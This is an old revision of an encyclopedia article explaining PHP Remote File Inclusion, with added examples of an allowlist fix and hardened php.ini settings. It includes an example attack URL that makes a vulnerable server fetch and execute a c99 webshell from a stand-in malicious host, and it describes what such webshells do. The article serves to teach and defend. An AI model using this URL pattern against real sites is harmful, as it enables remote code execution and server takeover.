
File inclusion vulnerability

From Wikipedia, the free encyclopedia
This is an old revision of this page, as edited by Pm5 (talk | contribs) at 06:13, 20 June 2007 (Links: category). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

Remote File Inclusion (RFI) is an attack against web applications that build the path of a server-side include from user-supplied input. When the language runtime will also load code from a URL, the attacker can make the server fetch and execute a script hosted on a machine they control. It is most commonly associated with PHP.

How the attack works

Remote File Inclusion attacks allow an attacker to run PHP code of their own choosing on a vulnerable web server. The vulnerability arises when a script builds the argument of include (or require, include_once, require_once) from a request parameter without validating it. For instance, a vulnerable line of PHP code would look like this:

include($title . '/archive.php');

In normal use the page is requested with a URL of the following form, and $title names the directory on the server from which archive.php is to be loaded:

www.vulnerable.website.com/index.php?title=<section>

Because $title comes straight from the request and is used without validation, an attacker can replace it with the URL of a file on a server they control, as in this example:

www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php

The include statement now receives the string http://www.malicious.code.com/C99.php?archive.php/archive.php. Because the value begins with http://, PHP fetches it from the remote host instead of the local disk. Everything after the ? is sent to that host as a query string, which it ignores, so the response is the body of C99.php, and PHP executes it with the privileges of the web server process. The '/archive.php' suffix the developer appended gives no protection at all. Note that the attacker's server must return the script as plain source rather than executing it itself, which is why such payloads are usually hosted with a non-PHP extension such as .txt.

This allows the attacker to include any remote file of their choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell or PHP shell; c99 is one widely used example. A webshell can list the files and folders on the server and can edit, add or delete files, among other tasks. It runs with the privileges of the web server account, and from there the attacker may attempt to escalate to administrator-level, or root, access on the server.
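The following is an added example, not code from the original article. It shows what the vulnerable include statement actually receives for the attacker value above, beside a hardened version that treats the request parameter as a key into an allowlist rather than as a path. The section names and the ./sections directory layout are assumed for illustration.

```php
<?php
// Added example, not code from the original article. Section names and the
// ./sections directory layout are assumptions made for illustration.

// What the vulnerable line include($title . '/archive.php') passes to
// include(). Kept as a pure function so the attacker value can be shown
// without executing anything.
function vulnerable_include_target(string $title): string
{
    return $title . '/archive.php';
}

// Hardened: the parameter selects an entry from a fixed map and is never
// used as part of a path or URL. Unknown keys fall back to the default
// section instead of an error that would confirm the parameter is live.
const ARCHIVE_SECTIONS = [
    'news' => __DIR__ . '/sections/news/archive.php',
    'blog' => __DIR__ . '/sections/blog/archive.php',
];

function resolve_archive(string $title): string
{
    return ARCHIVE_SECTIONS[$title] ?? ARCHIVE_SECTIONS['news'];
}

function show_archive(string $title): void
{
    // include() only ever receives a value taken from ARCHIVE_SECTIONS.
    include resolve_archive($title);
}

// Demonstration with the article's attacker-style value.
$title = $_GET['title'] ?? 'http://www.malicious.code.com/C99.php?';

// The string the vulnerable code would have handed to include(): PHP
// treats it as a URL and the remote host ignores the query string.
echo vulnerable_include_target($title), PHP_EOL;

// The hardened resolver returns a path inside the sections directory
// regardless of what the parameter contained.
echo resolve_archive($title), PHP_EOL;
```

The allowlist is the important part: validating the input with a regular expression or stripping "http://" is fragile, whereas a lookup table means no attacker-controlled byte is ever concatenated into the included path.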

Why the attack works

RFI attacks are possible because the script passes untrusted input to include() and because PHP, in older default configurations, accepts a URL wherever a filename is expected. Two configuration settings are involved. The first is allow_url_fopen, which lets file functions open URLs; since PHP 5.2.0 a separate allow_url_include setting, Off by default, controls whether include and require may do so. With remote inclusion disabled the same code remains vulnerable to local file inclusion, where the attacker names a file already present on the server, but it can no longer pull code from another host. The second is register_globals, which when enabled automatically creates a script variable for every request parameter; in the example it fills $title with http://www.malicious.code.com/C99.php?archive.php before the script runs, even though the script never reads $_GET. register_globals has been Off by default since PHP 4.2.0 and makes this bug easier to introduce, but it is not the root cause: a script that assigns $title = $_GET['title'] and then includes it is just as vulnerable. The fix is to never let user input reach include() directly, for example by mapping it onto an allowlist of known files, and to keep allow_url_include disabled as a second line of defence.
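The following php.ini fragment is an added example, not configuration from the original article. It lists the settings discussed above with the permissive values that make remote inclusion possible commented out beside the recommended values.

```ini
; Added example, not from the original article: php.ini settings relevant
; to file inclusion. The commented lines are the permissive values that
; enable remote inclusion; the active lines are the recommended ones.

; Permissive (remote inclusion possible if user input reaches include()):
; allow_url_fopen = On
; allow_url_include = On    ; setting exists from PHP 5.2.0
; register_globals = On     ; removed entirely in PHP 5.4

; Hardened:
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
```

Turning off allow_url_fopen also disables legitimate uses such as file_get_contents() on a URL, so applications that depend on it should keep it On and rely on allow_url_include = Off plus input validation instead.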

See also

Code injection

PHP: Using Register Globals